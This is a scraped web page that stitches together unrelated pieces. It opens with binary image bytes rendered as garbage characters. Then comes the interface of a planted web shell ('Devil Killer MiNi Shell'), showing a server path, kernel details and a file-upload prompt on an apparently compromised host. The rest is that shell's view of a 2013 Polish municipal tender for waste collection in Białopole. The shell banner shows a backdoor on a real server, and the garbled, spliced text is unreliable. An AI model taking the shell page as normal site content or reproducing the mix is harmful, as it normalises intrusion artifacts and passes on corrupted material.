JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130521/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130521/83585-N-2013.html

<p class="kh_header"><b>Białopole: Odbiór i zagospodarowanie odpadów z terenu Gminy Białopole</b><br>
<b>Numer ogłoszenia: 83585 - 2013; data zamieszczenia: 21.05.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Białopole , ul. Chełmska 1, 22-135 Białopole, woj. lubelskie, tel. 082 5682204, 5682286, faks 082 5682286.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.ugbialopole.bip.lubelskie.pl/index.php?id=6</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Odbiór i zagospodarowanie odpadów z terenu Gminy Białopole.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 3. OPIS PRZEDMIOTU ZAMÓWIENIA:
3.1. Informacje ogólne:
Przedmiotem zamówienia jest zadanie pn.Odbiór i zagospodarowanie odpadów z terenu Gminy Białopole.
Przedmiot zamówienia opisany jest następującymi Kodami CPV:
90.51.31.00-7		Usługi wywozu odpadów pochodzących z gospodarstw domowych;
90.50.00.00-2		Usługi związane z odpadami;
90.53.30.00-2 		Usługi gospodarki odpadami.
Przedmiot zamówienia obejmuje:
1. Odbiór i zagospodarowanie odpadów komunalnych zmieszanych i gromadzonych selektywnie, odbieranych bez względu na występujące warunki atmosferyczne z nieruchomości zamieszkałych położonych na terenie Gminy Białopole z 15 miejscowości.
2. Odbiór i zagospodarowanie odpadów wielkogabarytowych, zużytego sprzętu elektrycznego i elektronicznego, materiałów budowlano-remontowych oraz rozbiórkowych, chemikaliów, akumulatorów oraz opon.
3. Zaopatrywanie nieruchomości w worki foliowe na frakcję suchą, szkło oraz odpady zmieszane w tym odpady zielone.
3.2. Rodzaj i częstotliwość odbioru odpadów komunalnych
1) Zabudowa zagrodowa i jednorodzinna:
Na terenie zabudowy zagrodowej i jednorodzinnej obowiązywał będzie system workowy zbiórki odpadów komunalnych, a częstotliwość odbioru będzie następująca:
a) Odpady zmieszane ( w tym frakcja mokra) - raz w miesiącu;
b) Frakcja sucha - raz w miesiącu;
c) Szkło - raz w miesiącu.
2) Zabudowa wielorodzinna:
Na terenie zabudowy wielorodzinnej obowiązywał będzie system kontenerowy oraz system workowy z następującą częstotliwością: 
a) Odpady zmieszane ( w tym frakcja mokra) -  system kontenerowy w ciągu 48 godzin od zgłoszenia;
b) Frakcja sucha - system workowy raz w miesiącu;
c) Szkło - system workowy raz w miesiącu.

3). Odbiór i zagospodarowanie odpadów  wielkogabarytowych, zużytego sprzętu elektrycznego i elektronicznego, materiałów budowlano-remontowych oraz rozbiórkowych, chemikaliów, akumulatorów oraz opon raz w roku  w terminie i miejscu ustalonym z Zamawiającym.

3.3. Wykaz urządzeń do gromadzenia odpadów i sprzętu technicznego:
1. Charakterystyka worków do zbiórki odpadów: worki  foliowe na frakcję suchą (oznaczonych kolorem żółtym), szkło ( oznaczonych kolorem zielonym), odpady mokre w tym odpady zielone ( oznaczone kolorem szarym). Worki wykonane będą z foli polietylenowej LDPE o pojemności 120 l grubości - worek żółty min. 0,035 mm, worek zielony min. 0,06 mm, worek szary min. 0,045 mm. Nadruk jednostronny, kolor nadruku czarny treść zostanie przekazana Wykonawcy w dniu podpisania umowy. Na 14 dni przed terminem pierwszej zbiórki odpadów Wykonawca zobowiązuje się dostarczyć do zamawiającego worki przeznaczone do zbiórki odpadów w miesiącu lipcu 2013 r.
Szacunkowa ilość worków przeznaczonych do zbiórki odpadów przez okres 18 miesięcy:
Żółte 	- 16.000 szt.
Zielone - 7.000 szt.
Szare 	-  7.000 szt.
Zamawiający zastrzega że podane wyżej ilości worków są ilościami szacunkowymi, pomocniczymi przy przygotowaniu postępowania przetargowego i SIWZ oraz wyceny realizacji zamówienia przez Wykonawców.
Ilość worków dostarczanych do poszczególnych nieruchomości ustalana będzie na podstawie zapotrzebowania właścicieli nieruchomości. Ustalone ilości worków Wykonawca dostarczy do Zamawiającego raz w miesiącu w terminie zbiórki odpadów.
2. Wykonawca zobowiązany jest do odbioru w terminach ustalonych w harmonogramie odpadów komunalnych z pojemników będących własnością właścicieli nieruchomości.
3. Sprzęt do odbioru odpadów:
Wykonawca powinien dysponować sprzętem specjalistycznym do odbioru i transportu odpadów tj.: co najmniej:
1. Dwoma pojazdami przystosowanymi do odbierania zmieszanych odpadów komunalnych ( w tym frakcji mokrej);
2. Dwoma  pojazdami przystosowanymi do odbierania selektywnie zebranych odpadów komunalnych;
3. Jednym pojazdem do odbierania odpadów bez funkcji kompaktującej, z dźwignikiem hakowym lub bramowym do opróżniania  kontenerów Kp-7 z odpadami.
Pojazdy powinny spełniać wymagania zgodne z rozporządzeniem Ministra środowiska z dnia 11 stycznia 2013 r. w sprawie szczegółowych wymagań w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości (Dz. U. 2013 poz. 122).

3.4. Szczegółowe dane charakteryzujące zamówienie:
a) liczba nieruchomości jednorodzinnych i zagrodowych -  814
b) Szacuje się że na terenie Gminy Białopole przebywa około 3000 osób
b) liczba nieruchomości wielorodzinnych (wspólnoty, spółdzielnie) - 1
c) długość dróg na terenie gminy do przejechania w trakcie zbiórki odpadów - około 70 km
d) Łączna szacunkowa ilość odpadów przewidzianych do zbiórki w ciągu 18 miesięcy ( w okresie trwania umowy) wynosi łącznie około 360 Mg w tym odpadów zebranych selektywnie  w ilości około 252 Mg oraz odpadów problemowych  i wielkogabarytowych około 24 Mg.
Ilość wytworzonych na terenie gminy Białopole odpadów nie jest zależna od Zamawiającego. Ustalone ilości są szacunkowe i mogą ulec zmianie stosownie do rzeczywistych ilości odpadów wytworzonych przez mieszkańców. 
Rozliczenie z Wykonawcą odbywać się będzie na podstawie rzeczywistych ilości odebranych odpadów komunalnych z terenu Gminy Białopole w okresach kwartalnych fakturą wystawioną do 10-go każdego miesiąca za poprzedni kwartał.

3.5. Wymagania stawiane Wykonawcy:
1. Wymagana jest należyta staranność przy realizacji zobowiązań umowy.
2. Zamawiający nie ponosi odpowiedzialności za szkody wyrządzone przez Wykonawcę podczas wykonywania przedmiotu zamówienia. Za szkody w majątku Zamawiającego lub osób  trzecich spowodowane w trakcie odbioru odpadów odpowiedzialność ponosi Wykonawca.
3. Wykonawca w ciągu 3 dni od podpisania umowy zobowiązany jest przedstawić harmonogram odbioru odpadów komunalnych z terenu Gminy Białopole Zamawiającemu do uzgodnienia.
4. Wykonawca odpowiada  za informowanie mieszkańców o zasadach i terminach odbierania poszczególnych rodzajów odpadów.
5. Wykonawca zobowiązany jest do odbioru w terminach ustalonych w harmonogramie odpadów komunalnych z pojemników będących własnością właścicieli nieruchomości.
6. Wykonawca zobowiązany jest do odbioru odpadów problemowych, wielkogabarytowych, zużytego sprzętu elektrycznego i elektronicznego, materiałów budowlano-remontowych oraz rozbiórkowych, chemikaliów, akumulatorów oraz opon raz w roku  w terminie i miejscu ustalonym z Zamawiającym.
Na miejsce zbiórki właściciele będą mogli dostarczać odpady wielkogabarytowe, budowlano-remontowe, odpady zielone, popiół, zużyty sprzęt elektryczny i elektroniczny, opony, akumulatory, chemikalia, opakowania po farbach, tonery i tusze do drukarek, baterie, świetlówki, środki ochrony roślin. 
7. Usługa obejmuje zapewnienie przed przez Wykonawcę dojazdu do punktów trudno dostępnych poprzez zorganizowanie środków transportu, które umożliwiają odbiór odpadów z punktów adresowych o trudnej lokalizacji (np. dróg gruntowych).
8. W sezonie zimowym, gdy ze względu na nieprzejezdność dróg niemożliwy będzie odbiór i wywóz odpadów zgodnie z ustalonym harmonogramem, Wykonawca jest zobowiązany do ich odbioru w niezwłocznym terminie, w którym droga stała się przejezdna. Wykonawca zobowiązany jest do informowania Zamawiającego o zaistniałej sytuacji.
9. Worki do zbiórki odpadów zapewnia Wykonawca. Ilość worków dostarczanych do poszczególnych nieruchomości ustalana będzie na podstawie zapotrzebowania właścicieli nieruchomości. Ustalone ilości worków Wykonawca dostarczy do Zamawiającego raz w miesiącu w terminie zbiórki odpadów.
10. Wykonawca zobowiązany jest do monitorowania obowiązku ciążącego na właścicielu nieruchomości w zakresie selektywnego zbierania odpadów komunalnych. W przypadku stwierdzenia że właściciel nieruchomości nie wywiązuje się z deklarowanego obowiązku segregacji odpadów, Wykonawca odbiera odpady jako zmieszane i w terminie 2 dni od dnia zaistnienia opisanej sytuacji jest zobowiązany do pisemnego lub drogą elektroniczną poinformowania Zamawiającego o niewywiązywaniu się z obowiązków segregacji odpadów przez właściciela nieruchomości. Wraz z informacją Wykonawca zobowiązany jest załączyć dokumentację umożliwiającą identyfikację nieruchomości (adres) i zdjęcie fotograficzne dokumentujące ww. nieprawidłowości w celu weryfikacji złożonych deklaracji.
11.Wykonawca ma obowiązek  odbioru sprzed posesji w terminach ustalonych w harmonogramie odpadów zmieszanych, frakcji suchej i szkła.
12. Załadunek i transport odpadów odbywać  się będzie za pomocą odpowiedniego sprzętu oraz
środków transportu, które muszą być w stałej dyspozycji Wykonawcy. Pojazdy winny spełniać
wymagania zgodnie z Rozporządzeniem Ministra Środowiska z dnia 11 stycznia 2013 r. w sprawie
szczegółowych wymagań w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości (Dz. U. z 2013 r. poz. 122).
13. Wykonawca wraz z fakturą za wykonane usługi dostarczać będzie kopię dokumentu
potwierdzającego ilości odpadów odebranych w okresie, którego dotyczy faktura, a także karty
ewidencji odpadów lub karty przekazania odpadów. Dodatkowo Wykonawca będzie dostarczać informację o ilości odebranych odpadów z nieruchomości niezamieszkałych, jeżeli zawrze stosowne umowy.
14. Odpady odebrane od właścicieli nieruchomości z terenu Gminy Białopole Wykonawca zobowiązany jest zagospodarować ( poddać odzyskowi lub unieszkodliwieniu) zgodnie z hierarchią postępowania z odpadami, o której mowa w art. 17 ustawy o odpadach. Odpady odebrane od właścicieli nieruchomości z terenu Gminy Białopole należy przekazać do regionalnych instalacji przetwarzania odpadów komunalnych wskazanych w Uchwale Nr XXIV/397/2012 Sejmiku Województwa Lubelskiego z dnia 30 lipca 2012 r. w sprawie wykonania Planu gospodarki odpadami dla województwa lubelskiego 2017 jako instalacja główna lub zastępcza. Wykonawca jest zobowiązany przedstawić Zamawiającemu jeden raz na miesiąc dowód potwierdzający wykonanie tych czynności, tj. karty przekazania odpadów.
15.  Wykonawca ma obowiązek utrzymywania standardów sanitarnych oraz standardów ochrony
środowiska zgodnie z Rozporządzeniem Ministra Środowiska w sprawie szczegółowych wymagań w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości (Dz. U. z 2013r. poz.122), Rozporządzenia Ministra Środowiska w sprawie bezpieczeństwa i higieny pracy przy
gospodarowaniu odpadami komunalnymi (Dz. U. z 2009r Nr 104, poz.868) i postanowieniami
regulaminu utrzymania czystości i porządku na terenie Gminy Białopole.
16. Wykonawca będzie prowadził ilościową i jakościową ewidencję odpadów zgodnie z przepisami ustawy o utrzymaniu czystości i porządku w gminach oraz ustawy o odpadach.
17. Zgodnie z ustawą o utrzymaniu czystości i porządku w gminach, Wykonawca będzie dostarczać
Zamawiającemu do końca miesiąca następnego po kwartale, kwartalne sprawozdania z :
- ilości poszczególnych rodzajów odpadów odebranych,
- sposobie ich zagospodarowania wraz ze wskazaniem instalacji, do której zostały przekazane,
- liczby właścicieli nieruchomości, od których zostały odebrane odpady, wskazanie właścicieli nieruchomości, którzy zbierają odpady komunalne w sposób niezgodny z regulaminem,
- ilości poddanych unieszkodliwieniu odpadów.
Wzór sprawozdania zgodny z Rozporządzeniem Ministra Środowiska z dnia 15 maja 2012 r. (Dz. U. z 2012 r. poz. 630).
Podstawą do sporządzenia sprawozdań jest dokumentacja sporządzana przy przekazywaniu odpadów do instalacji, w tym karty przekazania odpadów i ewidencja instalacji w zakresie postępowania z odpadami.
18. Wykonawca odpowiedzialny jest za osiąganie poziomów odzysku odpadów komunalnych z uwzględnieniem poziomów odzysku wskazanych w ustawie z dnia 13 września 1996 r. o utrzymaniu czystości i porządku w gminach (Dz. U z 2012r., poz. 391, z późn. zm.), rozporządzeniu Ministra Środowiska z dnia 29 maja 2012 roku w sprawie poziomów recyklingu, przygotowania do ponownego użycia i odzysku innymi metodami niektórych frakcji odpadów komunalnych (Dz. U z 2012r., poz. 645), oraz rozporządzeniu Ministra Środowiska z dnia 25 maja 2012 r. w sprawie poziomów ograniczenia masy odpadów komunalnych ulegających biodegradacji przekazywanych do składowania oraz sposobu obliczania poziomu ograniczania masy tych odpadów (Dz. U z 2012r., poz. 676).
19. Wykonawca zobowiązany jest do przestrzegania obowiązujących w trakcie trwania umowy przepisów prawnych, a w szczególności :
- ustawy z dnia 13 września 1996r. o utrzymaniu czystości i porządku w gminach (Dz. U. z 2012 r. poz. 391 z późn.zm.),
- ustawy z dnia 14 grudnia 2012r. o odpadach (Dz. U. z 2013r, poz.21),
- ustawy z dnia 27 kwietnia 2001r. Prawo ochrony Środowiska (Dz. U. z 2008r Nr 25 poz.150 z późn.zm),
- ustawy z dnia 29 lipca 2005r. o zużytym sprzęcie elektrycznym i elektronicznym (Dz. U. z 2005r Nr 180 poz.1495 z późn.zm.),
- ustawy z dnia 24 kwietnia 2009 r. o bateriach i akumulatorach (Dz. U. z 2009r. Nr 79 poz.666 z późn.zm),
- zapisami Wojewódzkiego Planu Gospodarki Odpadami, przyjętego uchwałą Sejmiku Województwa Lubelskiego, Nr XXIV/396/12 z dnia 30 lipca 2012r w sprawie uchwalenia Wojewódzkiego Planu Gospodarki Odpadami dla Województwa Lubelskiego ,
- uchwały Nr XX/87/12   Rady Gminy Białopole z dnia 30 listopada 2012 r.  w sprawie regulaminu utrzymania czystości i porządku na terenie Gminy Białopole
- uchwały Nr XXI/96/12 Rady gminy Białopole z dnia 28 grudnia 2012 r.   w sprawie określenia szczegółowego sposobu i zakresu świadczenia usług w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości i zagospodarowania tych odpadów.
- rozporządzenia Ministra Środowiska z dnia 21 kwietnia 2006r w sprawie listy odpadów, które posiadacz odpadów może przekazywać osobom fizycznym lub jednostkom organizacyjnym, nie będącym przedsiębiorcami, oraz dopuszczalnych metod ich odzysku ( Dz. U. Z 2006 r. Nr 75 poz.527 z późn. zm.),
- rozporządzenia Ministra Środowiska z dnia 11 stycznia 2013r w sprawie szczegółowych wymagań w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości (Dz. U. z 2013r. poz.122)
- ustawie z dnia 23 kwietnia 1964 r. Kodeks cywilny (Dz. U. z 1964 r. Nr 16 poz.93 z późn. zm.).
20. Informacja na temat możliwości powierzenia przez wykonawcę wykonania części lub całości zamówienia podwykonawcom :
Wykonawca może powierzyć wykonanie części lub całości niniejszego zamówienia podwykonawcom.
W takim przypadku zobowiązany jest do wykazania w formularzu ofertowym zakresu prac , którego wykonanie zamierza powierzyć podwykonawcom..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.51.31.00-7, 90.50.00.00-2, 90.53.30.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> WYMAGANIA DOTYCZĄCE WADIUM.
1. Zamawiający żąda wniesienia przez Wykonawcę wadium: w wysokości 5.000,00 zł
2. Termin wniesienia wadium upływa z terminem składania ofert.
3. Wykonawca wnosi wadium w jednej lub kilku następujących formach:
1) W pieniądzu, przelewem na rachunek bankowy Zamawiającego w Banku Spółdzielczym w Białopolu Nr 65 8202 0006 2001 0000 0202 0002 z dopiskiem Odbiór i zagospodarowanie odpadów z terenu Gminy Białopole - wadium. Kopię dokonania przelewu należy dołączyć do oferty. Oryginał przelewu przedstawić do wglądu w dniu otwarcia ofert. Za termin wniesienia wadium w formie pieniężnej przyjmuje się termin uznania na rachunku bankowym Zamawiającego co winno nastąpić przed upływem terminu składania ofert.
2) W poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
3) W gwarancjach bankowych;
4) W gwarancjach ubezpieczeniowych;
5) W poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r. Nr 42, poz. 275, z 2008 r. Nr 116, poz. 730 i 732 i Nr 227, poz. 1505 oraz z 2010 r. Nr 96, poz. 620).  
Sposób przekazania: poręczenia lub gwarancje złożyć u Zamawiającego w formie oryginału razem z ofertą w osobnej kopercie przed upływem terminu składania ofert. 
4.Polisa, poręczenie, gwarancje lub inny dokument stanowiący formę wadium winno zawierać stwierdzenie, że na pierwsze pisemne żądanie Zamawiającego wzywające do zapłaty kwoty wadium zgodnie z warunkami SIWZ, następuje jego bezwarunkowa wypłata bez jakichkolwiek zastrzeżeń ze strony gwaranta/poręczyciela. 
5. W przypadku niezabezpieczenia oferty jedną z określonych w niniejszej specyfikacji form wadium Wykonawca zostanie wykluczony z udziału w postępowaniu, a jego oferta podlegać będzie odrzuceniu.
6. Zwrot wadium nastąpi w terminach i na warunkach określonych w art.46 ust. 1, 1a i 2 ustawy.
7. Wykonawca, którego oferta została wybrana, traci wadium na rzecz Zamawiającego w przypadkach określonych w art. 46 ust.5  Ustawy.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wymagane jest posiadanie wpisu do rejestru działalności regulowanej w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości z terenu Gminy Białopole.
W przypadku wykonawców występujących  wspólnie zamawiający wymaga, aby każdy z wykonawców posiadał w/w uprawnienia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wymagane jest złożenie oświadczenia o spełnieniu warunków udziału w postępowaniu zgodnie z art. 22 ust. 1 ustawy Pzp.- załącznik nr 2 do SIWZ.
W przypadku wykonawców występujących  wspólnie Zamawiający dokona łącznej oceny wykonawców w zakresie spełniania wyżej opisanego warunku. Wykonawcy mogą złożyć oświadczenie wspólne.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wymagane jest wykazanie przez Wykonawcę - posiadania lub dysponowania co najmniej:
1. Dwoma pojazdami przystosowanymi do odbierania zmieszanych odpadów komunalnych ( w tym frakcji mokrej);
2. Dwoma pojazdami przystosowanymi do odbierania selektywnie zebranych odpadów komunalnych;
3. Jednym pojazdem do odbierania odpadów bez funkcji kompaktującej, z dźwignikiem hakowym lub bramowym do opróżniania  kontenerów Kp-7 z odpadami.
Pojazdy powinny spełniać wymagania zgodne z rozporządzeniem Ministra środowiska z dnia 11 stycznia 2013 r. w sprawie szczegółowych wymagań w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości (Dz. U. 2013 poz. 122).
W przypadku wykonawców występujących wspólnie Zamawiający dokona łącznej oceny wykonawców w zakresie spełniania wyżej opisanego warunku.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Brak wymagań.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wymagane jest złożenie oświadczenia o spełnieniu warunków udziału w postępowaniu zgodnie z art. 22 ust. 1 ustawy Pzp.- załącznik nr 2 do SIWZ.
W przypadku wykonawców występujących  wspólnie Zamawiający dokona łącznej oceny wykonawców w zakresie spełniania wyżej opisanego warunku. Wykonawcy mogą złożyć oświadczenie wspólne</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

